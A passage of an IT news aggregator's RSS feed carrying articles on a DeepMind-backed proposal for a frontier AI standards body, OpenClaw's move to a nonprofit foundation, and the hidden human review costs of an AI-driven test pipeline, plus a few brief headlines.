<p class="wp-block-paragraph">An almost completely opposite stance came from <a href="https://www.linkedin.com/in/yurigoryunov/" target="_blank" rel="noreferrer noopener">Yuri Goryunov</a>, CIO of consulting firm Acceligence, who applauded the proposed move.</p>



<p class="wp-block-paragraph">“This is one of the rare setups where industry self-regulation has a real shot, and enterprise IT should be enthusiastically rooting for it,” he said. “It fails when harms are externalized, such as in social media content moderation. Or when the overseer outsources judgment to the overseen, such as the FAA’s delegation to Boeing before the 737 MAX. It works when everyone in the industry shares the catastrophic downside.”</p>



<p class="wp-block-paragraph">He suggested, however, that the best precedent here isn’t FINRA, it’s INPO, the Institute of Nuclear Power Operations, which the nuclear industry created within months of the <a href="https://www.nrc.gov/reading-rm/doc-collections/fact-sheets/3mile-isle" target="_blank" rel="noreferrer noopener">1979 Three Mile Island partial reactor meltdown</a> “on the logic that an accident anywhere is an accident everywhere. INPO peer-reviews every US plant, its evaluations move insurance premiums, and it sits on top of the NRC’s statutory floor. That is a public-private stack very close to what Hassabis is describing. Frontier AI has the same structure: one lab’s catastrophic failure brings regulation down on all of them.”</p>



<p class="wp-block-paragraph">For enterprise CIOs and other IT executives, Goryunov said, that model has the potential for being a big win.</p>



<p class="wp-block-paragraph"><strong>“</strong>Today, every enterprise duplicates the same AI diligence of red-teaming, eval suites, governance committees and each does so with less information than any certifying body would have,” Goryunov said. “A credible standards regime does for AI what UL did for electrical equipment and SOC2 did for cloud: it converts an unknowable risk into a procurable product and gives boards a defensible standard of care. That’s not red tape. That’s peace of mind with an audit trail.”</p>



<p class="wp-block-paragraph">However, Mahapatra said, “the countervailing view is that the alternative to industry-led standards is probably not thoughtful legislation. It is probably no standards, or state-by-state fragmentation, or the current pattern of ex-post enforcement actions where regulators surface concerns years after harm has already occurred.” </p>



<p class="wp-block-paragraph">Thus, he noted, “Hassabis is making the reasonable argument that imperfect fast standards are better than perfect slow ones, and there is genuine merit to that view for topics like agent identity, evaluation methodology, and interoperability, which are exactly the areas <a href="https://www.computerworld.com/article/4196365/openclaw-becomes-a-nonprofit-foundation-as-it-seeks-to-be-the-switzerland-of-ai.html" target="_blank">OpenClaw is also targeting</a>.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[DeepMind CEO again pushes for a frontier AI standards body]]></title>
<description><![CDATA[Google DeepMind CEO Demis Hassabis on Tuesday reiterated his push for an AI industry self-regulation effort, led by the US government, that is particularly focused on artificial general intelligence (AGI) and national security. 



But it is precisely that focus on national security that may make...]]></description>
<link>https://tsecurity.de/de/3671859/it-nachrichten/deepmind-ceo-again-pushes-for-a-frontier-ai-standards-body/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671859/it-nachrichten/deepmind-ceo-again-pushes-for-a-frontier-ai-standards-body/</guid>
<pubDate>Wed, 15 Jul 2026 23:01:42 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Google DeepMind CEO Demis Hassabis on Tuesday reiterated his push for an AI industry self-regulation effort, led by the US government, that is particularly focused on <a href="https://www.computerworld.com/article/4174181/google-talks-singularity-while-scaling-up-agentic-ai-for-enterprises-2.html" target="_blank">artificial general intelligence (AGI)</a> and national security. </p>



<p class="wp-block-paragraph">But it is precisely that focus on national security that may make the results of such an effort, assuming it happens, less than palatable outside of the US.</p>



<p class="wp-block-paragraph">“The rapid progress we’re seeing in AI requires a new approach to testing frontier AI model capabilities that is dynamic, adaptable, and rigorous,” <a href="https://demishassabis.substack.com/p/a-framework-for-frontier-ai-and-the-dawning-of-a-new-age" target="_blank" rel="noreferrer noopener">Hassabis wrote</a>. “The US is well positioned, given its economic and technical standing, to take the first step in developing such a framework. It could establish a new Standards Body modelled on a federally overseen public-private partnership or self-regulatory organization, much like the Financial Industry Regulatory Authority (FINRA), with a board that includes independent leading technical experts and open-source representatives.”</p>



<p class="wp-block-paragraph">He noted, however, that the funding would need to be substantial, and would most likely come from industry, to allow the new body to attract world-class technical talent and obtain the necessary compute resources for large-scale testing.</p>



<p class="wp-block-paragraph">Hassabis said he would propose that the organization “be responsible for developing assessment protocols and working with appropriate federal agencies and the US National Labs to conduct testing in areas relevant to national security,” and that AI vendor participants would be encouraged to adopt best practices, such as publishing model cards with technical details, maintaining strong internal cybersecurity, vetting key personnel, and providing sufficient resourcing for safety and security research.</p>



<p class="wp-block-paragraph">This is not the first time Hassabis has <a href="https://www.computerworld.com/article/4178398/deepmind-ceo-agi-could-be-here-in-three-years.html" target="_blank">expressed worries about AGI</a>. He has already worked on <a href="https://www.cio.com/article/4168122/us-government-agency-to-safety-test-frontier-ai-models-before-release.html" target="_blank">a US government initiative evaluating AI safety</a>, which involved DeepMind, Microsoft and xAI (now SpaceXAI) working with the Center for AI Standards and Innovation (CAISI), a division of the US Department of Commerce. It allowed CAISI to conduct pre-deployment evaluations and targeted research to “better assess frontier AI capabilities and advance the state of AI security.”  </p>



<h2 class="wp-block-heading">The rest of the world may have concerns</h2>



<p class="wp-block-paragraph">Analysts and consultants were mixed about the move, with most expressing concerns about whether an industry-focused group would prioritize the public’s best interests.</p>



<p class="wp-block-paragraph">“Self-regulation is not viable because it implies everyone is able to regulate themselves and will do so in line with the best interests of the public. Most tech vendors don’t have the capacity to self-regulate. They would just prefer a set of rules within which they can operate,” said Gartner VP analyst <a href="https://www.gartner.com/en/experts/nader-henein" target="_blank" rel="noreferrer noopener">Nader Henein</a>. “For-profit organizations are required to do what is best for their shareholders, and external regulation ensures that those organizations are never in a conflict of interest where they have to choose between what is good for their shareholders and what is good for the public.”</p>



<p class="wp-block-paragraph">And, said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research, given the international nature of AI models, an effort coordinated by the US government might alienate other countries. </p>



<p class="wp-block-paragraph">“National security is the proposal’s accelerator in Washington and its poison pill abroad: the framing that opens the only gate available at home invites foreign capitals to read the institution as an instrument of American strategy,” he pointed out. </p>



<p class="wp-block-paragraph">“The map is already plural,” he said. “Brussels switches on enforcement powers over general-purpose models [starting in August 2026], London runs the AI Security Institute, and Beijing licenses on its own terms. California and New York have legislated for frontier models at home. The durable route is shared technical evidence with sovereign enforcement, sealed through mutual recognition rather than deference, with India and the other major non-Western markets holding authorship rather than seats.”</p>



<p class="wp-block-paragraph">Gogia added that the rules enacted by even such a group may not address all of the key concerns of enterprise IT. A US government effort along the lines that Hassabis is proposing would result in testing that “sits close to intelligence and industrial policy, and those functions will not stay neatly separated. A model can pass every catastrophic-risk test and still fail the enterprise on privacy, reliability, and liability,” he noted.</p>



<p class="wp-block-paragraph">Walmart’s former director of cybersecurity <a href="https://www.linkedin.com/in/steveneric/" target="_blank" rel="noreferrer noopener">Steven Eric Fisher</a>, who is now an independent cybersecurity consultant, said he found the proposal “well-intentioned, but it addresses a highly polarized topic at a time when commercial interests carry unprecedented political influence, which is not always applied benevolently.”</p>



<p class="wp-block-paragraph">He added, “an exclusive US standard that is not globally respected or enforceable would likely fail to achieve its core purpose and would place US companies at a competitive disadvantage.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/akm76/" target="_blank" rel="noreferrer noopener">Aman Mahapatra</a>, chief strategy officer for Tribeca Softtech, a New York City-based technology consulting firm, said that a deep dive into how <a href="https://www.finra.org/" target="_blank" rel="noreferrer noopener">FINRA</a> operates today is illustrative of what IT leaders can expect from this effort, assuming the industry adopts that model.</p>



<p class="wp-block-paragraph">“When the CEOs of the five companies that would be regulated are also the primary drafters of the standards, the standards will reflect those companies’ interests. FINRA has an independent board, but the operational reality is that member firm perspectives dominate the working groups that write the actual rules,” he said. “There is no reason to expect an AI equivalent to work differently, and every reason to expect it to work worse, because AI standardization is happening faster than any industry has ever attempted to standardize itself, and speed is the enemy of independent oversight.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/carmi/" target="_blank" rel="noreferrer noopener">Carmi Levy</a>, an independent technology analyst, was even more emphatically opposed to the Hassabis proposal.</p>



<p class="wp-block-paragraph">“Asking Big Tech companies to self-police is analogous to allowing foxes to guard the henhouse. It hasn’t worked to date, and it won’t work going forward. Expecting these organizations to somehow change their ways at this point in time represents the height of naïve thinking,” Levy said. “The framework proposed by Demis Hassabis is a self-serving roadmap for an industry bent on racing to the AI horizon regardless of the harms caused along the way. It is impossible to quantify the dangers to broader society should frameworks allowing self-regulation become the norm.”</p>



<h2 class="wp-block-heading">Some love the proposal</h2>



<p class="wp-block-paragraph">An almost completely opposite stance came from <a href="https://www.linkedin.com/in/yurigoryunov/" target="_blank" rel="noreferrer noopener">Yuri Goryunov</a>, CIO of consulting firm Acceligence, who applauded the proposed move.</p>



<p class="wp-block-paragraph">“This is one of the rare setups where industry self-regulation has a real shot, and enterprise IT should be enthusiastically rooting for it,” he said. “It fails when harms are externalized, such as in social media content moderation. Or when the overseer outsources judgment to the overseen, such as the FAA’s delegation to Boeing before the 737 MAX. It works when everyone in the industry shares the catastrophic downside.”</p>



<p class="wp-block-paragraph">He suggested, however, that the best precedent here isn’t FINRA, it’s INPO, the Institute of Nuclear Power Operations, which the nuclear industry created within months of the <a href="https://www.nrc.gov/reading-rm/doc-collections/fact-sheets/3mile-isle" target="_blank" rel="noreferrer noopener">1979 Three Mile Island partial reactor meltdown</a> “on the logic that an accident anywhere is an accident everywhere. INPO peer-reviews every US plant, its evaluations move insurance premiums, and it sits on top of the NRC’s statutory floor. That is a public-private stack very close to what Hassabis is describing. Frontier AI has the same structure: one lab’s catastrophic failure brings regulation down on all of them.”</p>



<p class="wp-block-paragraph">For enterprise CIOs and other IT executives, Goryunov said, that model has the potential for being a big win.</p>



<p class="wp-block-paragraph"><strong>“</strong>Today, every enterprise duplicates the same AI diligence of red-teaming, eval suites, governance committees and each does so with less information than any certifying body would have,” Goryunov said. “A credible standards regime does for AI what UL did for electrical equipment and SOC2 did for cloud: it converts an unknowable risk into a procurable product and gives boards a defensible standard of care. That’s not red tape. That’s peace of mind with an audit trail.”</p>



<p class="wp-block-paragraph">However, Mahapatra said, “the countervailing view is that the alternative to industry-led standards is probably not thoughtful legislation. It is probably no standards, or state-by-state fragmentation, or the current pattern of ex-post enforcement actions where regulators surface concerns years after harm has already occurred.” </p>



<p class="wp-block-paragraph">Thus, he noted, “Hassabis is making the reasonable argument that imperfect fast standards are better than perfect slow ones, and there is genuine merit to that view for topics like agent identity, evaluation methodology, and interoperability, which are exactly the areas <a href="https://www.computerworld.com/article/4196365/openclaw-becomes-a-nonprofit-foundation-as-it-seeks-to-be-the-switzerland-of-ai.html" target="_blank">OpenClaw is also targeting</a>.”</p>



<p class="wp-block-paragraph"><em>This article originally appeared on CIO.com.</em></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Top AI tools such as OpenClaw and Github Copilot can be hijacked to create new massive botnets]]></title>
<description><![CDATA[Researchers find nine of the most popular AI platforms are susceptible to a new attack that exploits hallucinations to set up a botnet.]]></description>
<link>https://tsecurity.de/de/3671788/it-nachrichten/top-ai-tools-such-as-openclaw-and-github-copilot-can-be-hijacked-to-create-new-massive-botnets/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671788/it-nachrichten/top-ai-tools-such-as-openclaw-and-github-copilot-can-be-hijacked-to-create-new-massive-botnets/</guid>
<pubDate>Wed, 15 Jul 2026 22:18:02 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Researchers find nine of the most popular AI platforms are susceptible to a new attack that exploits hallucinations to set up a botnet.]]></content:encoded>
</item>
<item>
<title><![CDATA[Don’t Neglect the Operational Groundwork]]></title>
<description><![CDATA[Autonomous agents are moving faster than the field’s ability to govern them, and catching up requires more than better prompts or bigger sandboxes. At O’Reilly’s recent AI Superstream focused on OpenClaw and the broader ecosystem of locally run and self-hosted AI agents, five speakers, each worki...]]></description>
<link>https://tsecurity.de/de/3671437/ai-nachrichten/dont-neglect-the-operational-groundwork/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671437/ai-nachrichten/dont-neglect-the-operational-groundwork/</guid>
<pubDate>Wed, 15 Jul 2026 19:03:02 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Autonomous agents are moving faster than the field’s ability to govern them, and catching up requires more than better prompts or bigger sandboxes. At O’Reilly’s recent AI Superstream focused on OpenClaw and the broader ecosystem of locally run and self-hosted AI agents, five speakers, each working at a different layer of the stack, explored patterns […]]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw becomes a nonprofit foundation as it seeks to be ‘the Switzerland of AI’]]></title>
<description><![CDATA[OpenClaw’s announcement that it has become a nonprofit foundation is generating IT excitement because of the potential for governance and development consistency that the popular platform has thus far lacked. Still, some worry about the risks created by the move. 



“Our ambition is for OpenClaw...]]></description>
<link>https://tsecurity.de/de/3671162/ai-nachrichten/openclaw-becomes-a-nonprofit-foundation-as-it-seeks-to-be-the-switzerland-of-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671162/ai-nachrichten/openclaw-becomes-a-nonprofit-foundation-as-it-seeks-to-be-the-switzerland-of-ai/</guid>
<pubDate>Wed, 15 Jul 2026 17:19:35 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">OpenClaw’s announcement that it has become a nonprofit foundation is generating IT excitement because of the potential for governance and development consistency that <a href="https://www.computerworld.com/article/4128257/openclaw-the-ai-agent-thats-got-humans-taking-orders-from-bots.html" target="_blank">the popular platform </a>has thus far lacked. Still, some worry about the risks created by the move. </p>



<p class="wp-block-paragraph">“Our ambition is for OpenClaw to be the Switzerland of AI. Neutral ground where every model and every lab can plug into the technology and collaborate on standards in the era of agents,” <a href="https://openclaw.ai/blog/introducing-openclaw-foundation/" target="_blank" rel="noreferrer noopener">OpenClaw said in a post</a>. “That work is already underway in Foundation-convened councils on agent identity, agent profiles, evals, and enterprise deployment.”</p>



<p class="wp-block-paragraph">The statement, co-authored by OpenClaw creator <a href="https://www.linkedin.com/in/steipete/" target="_blank" rel="noreferrer noopener">Peter Steinberger</a>, pointed out, “the great open source projects of our time — Linux, Apache, Mozilla — endure because a neutral steward stands behind them. That is the role we are taking on to keep OpenClaw MIT licensed, open, and independent so that everyone building on it can trust it will be here for the long term.”</p>



<p class="wp-block-paragraph">But it reassured users that the original OpenClaw leadership is still in charge.</p>



<p class="wp-block-paragraph">“Peter built this thing and Peter keeps making the calls, especially the technical ones. Since joining OpenAI earlier this year, he has continued to steward OpenClaw as an open and independent project, and OpenAI has made a commitment to keep it that way,” the post said. “The foundation is here to serve: good governance, stable funding, and paying the people who keep the claws alive.”</p>



<p class="wp-block-paragraph">However, some analysts and consultants were skeptical about how much true independence Steinberger would have, given his salaried role with OpenAI. </p>



<h2 class="wp-block-heading">Neutrality claim in question</h2>



<p class="wp-block-paragraph">“The Switzerland of AI neutrality claim collapses under its own announcement,” said <a href="https://www.linkedin.com/in/noah-m-kenney-27499a166/" target="_blank" rel="noreferrer noopener">Noah Kenney</a>, principal consultant at Digital 520. “OpenAI runs a team [at OpenAI] called Claw Labs that Peter leads and OpenAI is a major donor to OpenClaw. The ‘neutral steward’s’ chief technical decision maker is employed by one of the competing labs it is supposed to be neutral with.” To OpenAI, he said, OpenClaw is closer to a tax-exempt nonprofit subsidiary than it is to a neutral ‘Switzerland of AI.’</p>



<p class="wp-block-paragraph">He pointed out that, in addition, Microsoft is shipping <a href="https://www.computerworld.com/article/4173442/enterpriseclaw-wants-to-bring-governance-to-the-openclaw-era-2.html" target="_blank">the enterprise version</a> of OpenClaw, and Nvidia is shipping the hardware bundle. “This is being called the Switzerland of AI, but Switzerland does not have its central bank run by France,” he observed.</p>



<p class="wp-block-paragraph">Kenney said that what the new OpenClaw has actually built is “a shared dependency that several competitors fund, staff, and steer, wrapped in a nonprofit structure. Enterprise IT should understand that structure, because treating OpenClaw as neutral is a mistake,” adding that CIOs need to look at this development devoid of the emotional component. </p>



<p class="wp-block-paragraph">“There is a strategic irony here that CIOs should sit with,” Kenney said. “If OpenClaw succeeds at becoming the universal agent substrate, then every model plugs into the same identity layer, the same profiles, and the same deployment plumbing. The thing every vendor is racing to own becomes a commodity that nobody owns.” He pointed out that, in the short term, that is genuinely good news for buyers because it means less lock-in and more portability.</p>



<p class="wp-block-paragraph">“But,” he said, “when the connective tissue is free and natural, the only labs that benefit are the ones with the best models and the deepest distribution. Commoditize the layer below you and you compete on the layer where you are already strongest. The foundation is not a charity. It is the biggest players agreeing to stop fighting over the plumbing so they can fight over the water, and the enterprise is the one paying the water bill either way.”</p>



<h2 class="wp-block-heading">Good news, bad news</h2>



<p class="wp-block-paragraph"><a href="https://moorinsightsstrategy.com/team/jason-andersen/" target="_blank" rel="noreferrer noopener">Jason Andersen</a>, principal analyst at Moor Insights &amp; Strategy, liked the potential consistency that could emerge from the structural change, given the complexity of agent development today. </p>



<p class="wp-block-paragraph">“We are seeing a lot of OpenClaw variants hit the market, such as those from Nvidia as well as competing products from cloud and SaaS vendors. A common base helps solidify the common parts,” Andersen noted. “That said, a common challenge is the sustainability of these open source foundations over time. In addition to releasing code, these foundations need funding to evolve and grow. And that funding needs to come from continued momentum to incentivize existing members to increase investment and recruit new members to join.”</p>



<p class="wp-block-paragraph">Andersen stressed that IT buyers need to keep an eye on the roadmap for any OpenClaw variant they choose to deploy, “as that will directly impact the foundation, and the momentum of the foundation and common base. If the common base loses momentum, it can lead to forks, or just a loss of innovation. When that happens, members tend to back away, which puts customers in limbo.”</p>



<p class="wp-block-paragraph">But not everyone sees the promised structure as entirely good for IT.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/ishraqkhann/" target="_blank" rel="noreferrer noopener">Ishraq Khan</a>, CEO at coding productivity tool vendor Kodezi, said, “most CIOs do not want to bet their future entirely on a single model vendor. They want Claude for some workloads, GPT for others, open models for sensitive environments, and potentially internally fine-tuned systems for specific use cases. The problem is that every vendor currently brings its own identity system, tool interfaces, permissions model, and operational assumptions. That fragmentation does not scale.”</p>



<p class="wp-block-paragraph">He said, “the risk if standards fail is straightforward: every vendor builds its own closed ecosystem, enterprises become locked into individual stacks, and security becomes dramatically harder. The opportunity if OpenClaw succeeds is equally significant: enterprises get portable agents, common identity standards, interoperable tooling, and a healthier competitive market around models rather than ecosystems.”</p>



<h2 class="wp-block-heading">Will it remain a nonprofit?</h2>



<p class="wp-block-paragraph">However, said <a href="https://acceligence.com/talent/profiles/justin-greis/" target="_blank" rel="noreferrer noopener">Justin Greis</a>, CEO of consulting firm Acceligence, one of the key details that IT executives will want to keep in mind is that OpenAI also began as a nonprofit, but it was quickly <a href="https://www.computerworld.com/article/4056490/openai-microsoft-discuss-shape-of-future-relationship.html" target="_blank">seen as not adhering to nonprofit objectives</a>. </p>



<p class="wp-block-paragraph">“OpenAI’s transition from a nonprofit research organization into a more complex structure highlighted the challenge of maintaining mission alignment while scaling technology, capital, partnerships, and commercial operations,” Greis said. “OpenClaw has the opportunity to address some of those governance questions earlier by establishing clear principles around neutrality, transparency, and decision-making before the ecosystem becomes even larger and more valuable.”</p>



<p class="wp-block-paragraph">He noted, “we have seen this pattern before with technologies like Linux and Kubernetes. The strongest open ecosystems succeeded because they created trusted foundations that enterprises could build upon. The technology was important, but the governance model that underpinned it was equally critical.”</p>



<h2 class="wp-block-heading">Risks are ‘squarely in IT’s lap’</h2>



<p class="wp-block-paragraph">Consultant <a href="https://formergov.com/directory/brianlevine" target="_blank" rel="noreferrer noopener">Brian Levine</a>, executive director of FormerGov, echoed Greis’ concerns. </p>



<p class="wp-block-paragraph">“CIOs shouldn’t assume that this nonprofit will always be a nonprofit, or confuse being a nonprofit with actually being neutral or unbiased,” he said. “The risks are squarely in IT’s lap: autonomous agents ‘with their own identity’ acting on a user’s behalf blow straight through traditional IAM assumptions. Issues, such as agent identity, auditability, secret handling. Identity boundaries have not yet been reliably solved. Until they are, enterprises should treat OpenClaw agents like privileged service accounts, not like a browser plugin.”</p>



<p class="wp-block-paragraph">Independent cybersecurity and risk advisor <a href="https://www.linkedin.com/in/steveneric/" target="_blank" rel="noreferrer noopener">Steven Eric Fisher</a> pointed to another IT exposure that might come from this OpenClaw transition: Cost.</p>



<p class="wp-block-paragraph">“OpenClaw currently has a very high token burn rate in usage, which presents a significant cost consideration for large-scale enterprise adoption,” he said. “The skills marketplace introduces <a href="https://www.csoonline.com/article/4129867/what-cisos-need-to-know-about-clawdbot-i-mean-moltbot-i-mean-openclaw.html" target="_blank">a new supply chain threat </a>that enterprises will need to manage. Threat management, and specifically handling <a href="https://www.csoonline.com/article/4135449/compromised-npm-package-silently-installs-openclaw-on-developer-machines.html" target="_blank">external marketplace elements</a>, can be highly challenging for open-source operations. Ultimately, at scale, enterprise adoption could become a difficult balancing act between managing high operational costs and securing an expanded security surface.”</p>



<p class="wp-block-paragraph"><em>This article originally appeared on <a href="https://www.computerworld.com/article/4196365/openclaw-becomes-a-nonprofit-foundation-as-it-seeks-to-be-the-switzerland-of-ai.html" target="_blank">Computerworld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[What 80% AI-written test pipelines actually cost]]></title>
<description><![CDATA[The first time I heard someone say their AI now wrote 80% of their tests, I asked the obvious question. Eighty percent of what?



After 20 years building and leading test automation for consumer-scale platforms, my honest answer turned out to be eighty percent of the typing, not eighty percent o...]]></description>
<link>https://tsecurity.de/de/3671153/ai-nachrichten/what-80-ai-written-test-pipelines-actually-cost/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671153/ai-nachrichten/what-80-ai-written-test-pipelines-actually-cost/</guid>
<pubDate>Wed, 15 Jul 2026 17:19:22 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The first time I heard someone say their AI now wrote 80% of their tests, I asked the obvious question. Eighty percent of what?</p>



<p class="wp-block-paragraph">After 20 years building and leading test automation for consumer-scale platforms, my honest answer turned out to be eighty percent of the <em>typing</em>, not eighty percent of the <em>engineering</em>. The remaining twenty was where the work still lived. Budgeting for two percent of leftover effort was the mistake. When the real number was closer to thirty, that gap was the difference between a pipeline that shipped and one that quietly built up a queue of half-trusted features nobody could rely on.</p>



<p class="wp-block-paragraph">This piece is about that gap. As an independent research project on LLM-augmented testing methodology, I built a six-stage agentic pipeline that takes a design in Figma and produces running tests in WebDriverIO, connected end to end over the <a href="https://modelcontextprotocol.io/">Model Context Protocol</a>. It works. It has been useful. And the parts that broke surprised me, because they were not the parts the hype cycle tells you to worry about.</p>



<h2 class="wp-block-heading">How I wired a six-stage pipeline over one protocol</h2>



<p class="wp-block-paragraph">The pipeline runs six stages in sequence, each owned by a different agent, with every handoff crossing MCP.</p>



<p class="wp-block-paragraph">Six-stage agentic test pipeline: design capture → requirements writer → ticket opener → code generator → test-case writer → automation generator. Each stage carries an MCP handoff and a provenance stamp.</p>



<p class="wp-block-paragraph">The end-to-end trace links a pull request back to a Jira ticket, a requirements section and a Figma frame. Each artifact is stamped with the agent that produced it, the model it used and the inputs it was given.</p>



<p class="wp-block-paragraph">MCP is the boring middle that makes any of this work. The cliché is that MCP is “USB-C for AI”: one open protocol, any tool. Like most analogies, it is about eighty percent right. The part that matters is the eighty: I do not have to write a custom adapter for every system the agent talks to. One MCP server per tool and every agent talks to all of them the same way.</p>



<p class="wp-block-paragraph"><strong>Typed handoffs between agents are my own architecture, layered on top of MCP rather than provided by it.</strong> Each agent writes a typed artifact the next agent reads. Each handoff is logged with provenance. When something went wrong six stages in, I could replay the chain. Without that discipline, a multi-agent pipeline is a debugger’s worst day. You know the test plan is wrong. You cannot tell whether the mistake came from the Figma read, the requirements interpretation or the ticket scaffolding. With it, I could point at exactly which stage went sideways and which inputs it was looking at when it did. The pattern lives in a <a href="https://github.com/SuneetMalhotra/agent-harness">public MIT-licensed reference implementation</a> for any reader who wants to run it.</p>



<p class="wp-block-paragraph"><strong>The sixteen-minute number is the marketing number.</strong> I ran the full chain end to end in about sixteen minutes on a synthetic net-new screen, Figma in, automation suite out. That repeated across my runs; it is not a demo trick. But sixteen minutes is the part of the story most fun to tell and least useful to learn from. It is what gets quoted in the all-hands. The hours that come after, when a human reviews each handoff, are where the work actually lives.</p>



<h2 class="wp-block-heading">What actually broke in production-style runs</h2>



<p class="wp-block-paragraph">The failures that stalled my pipeline were rarely the ones I expected.</p>



<p class="wp-block-paragraph">I expected hallucinated APIs. I got them: the agent confidently called endpoint names that sounded right but did not exist. I expected sparse-spec-in, sparse-spec-out, where a Figma frame with no annotations produced a requirements doc with vague acceptance criteria, every time. I expected locator drift, the common UI-automation failure mode where a renamed component silently breaks an entire test suite. There is solid <a href="https://martinfowler.com/articles/nonDeterminism.html">outside writing on non-determinism in tests</a> covering this whole family of failure modes, and the agent inherited every one.</p>



<p class="wp-block-paragraph">What I did not expect, and what kept the pipeline down longer than any of the above, was the plumbing.</p>



<p class="wp-block-paragraph">The model backend timed out under load. It lost credentials silently and started returning empty strings, which the agent then read as confidence. A duplicate consumer on a shared long-poll API endpoint produced an HTTP 409 conflict that broke delivery without throwing anything visible. One unguarded exception inside one agent aborted a whole shared scheduler run and took the other agents in the registry down with it. The single worst incident cost me three hours to find. An environment variable had silently rotated overnight; every agent in the fleet was returning structurally valid but semantically empty requirements docs; the downstream stages were dutifully generating tests against nothing.</p>



<p class="wp-block-paragraph">None of those are model bugs. They are infrastructure. The agent literature, which is what I went looking through when I started this work, mostly does not talk about them.</p>



<p class="wp-block-paragraph">The fix was not better prompts. It was <a href="https://martinfowler.com/bliki/CircuitBreaker.html">circuit-breaker-style</a> review checkpoints between stages and what I now call <strong>the four-guard discipline</strong>: four small guards I consider non-negotiable on any unattended agentic pipeline. The bulkhead pattern from microservices is the most consequential. An unhandled exception inside one agent can no longer abort the shared run; the offending agent fails fast with a structured error and the others keep going. Paired with that, a pure-data fallback ensures a model timeout produces a deterministic output explicitly marked as degraded mode, rather than an empty string the next stage will misread as confidence. A single-owner lease sits on every shared external endpoint, the cure for the duplicate-consumer incident that ate one of my Sunday afternoons. The cheapest guard was the last to arrive: a one-line synthetic canary every agent has to produce a known correct response to before any real work begins, so a credentials rotation or silent backend failure trips an alert before downstream stages have generated artifacts against garbage.</p>



<p class="wp-block-paragraph">None of these guards is novel. They are textbook stability patterns at a new boundary: the seam between the LLM agent and the rest of the system, which most of the existing agent literature still treats as a solved problem.</p>



<h2 class="wp-block-heading">The 20% you don’t see, and when not to do this</h2>



<p class="wp-block-paragraph">Here is the part the demo videos leave out. Even when the pipeline works, the human time per stage does not go to zero.</p>



<p class="wp-block-paragraph">Human review time per ticket across five pipeline stages: code review 60-180 min, automation review and flaky-fix loop 30-90 min, ticket architecture and sequencing 30-60 min, test data and environment 15-30 min, requirements review 20-30 min. Net: the human still spends 20-30% of the original effort, almost all of it reviewing rather than creating.</p>



<p class="wp-block-paragraph"><strong>Net of all that, the human still spends twenty to thirty percent of the original effort, almost all of it reviewing rather than creating.</strong> The pipeline saves seventy to eighty percent, not ninety-eight. The trap is budgeting for the two percent you do not save.</p>



<p class="wp-block-paragraph">When does this kind of pipeline make sense? In my experience, when the Figma is richly annotated and acceptance criteria are clear up front; when there is review capacity to absorb the work the pipeline shifts onto humans; when the stack is well represented in the training data; and when the feature is net-new rather than a deep edit of legacy code. When does it not? When the design lives on a whiteboard. When the integration touches old code with hidden contracts. When the path is regulated or safety-critical. When there is no senior reviewer who can hold the line. When the work is exploratory and writing the spec is the actual point of the exercise.</p>



<p class="wp-block-paragraph">Teams I have seen succeed with agentic pipelines budget for the rework explicitly, staff the review queue and treat the saved hours as capacity for harder problems rather than headcount they can release. Teams I have seen struggle did the opposite: declared victory at the demo and quietly accumulated a backlog of half-trusted features the next quarter had to clean up.</p>



<p class="wp-block-paragraph">The right unit of measurement is not how much the pipeline generates. It is how much of what it generates a human still has to touch before you would ship it. Call it <strong>the 80/20 rework rule</strong>: measure the rework, not the generation. The teams that get the rework number right are the ones whose AI investments compound. The teams that stop counting at the headline percentage are the ones that own the cleanup six months later.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.infoworld.com/expert-contributor-network/"><strong><u>Want to join?</u></strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[release-publish/dfa246e6fd16-20260715]]></title>
<description><![CDATA[Release publish tooling for OpenClaw 2026.7.2-beta.1 retry]]></description>
<link>https://tsecurity.de/de/3670194/downloads/release-publishdfa246e6fd16-20260715/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670194/downloads/release-publishdfa246e6fd16-20260715/</guid>
<pubDate>Wed, 15 Jul 2026 11:47:21 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
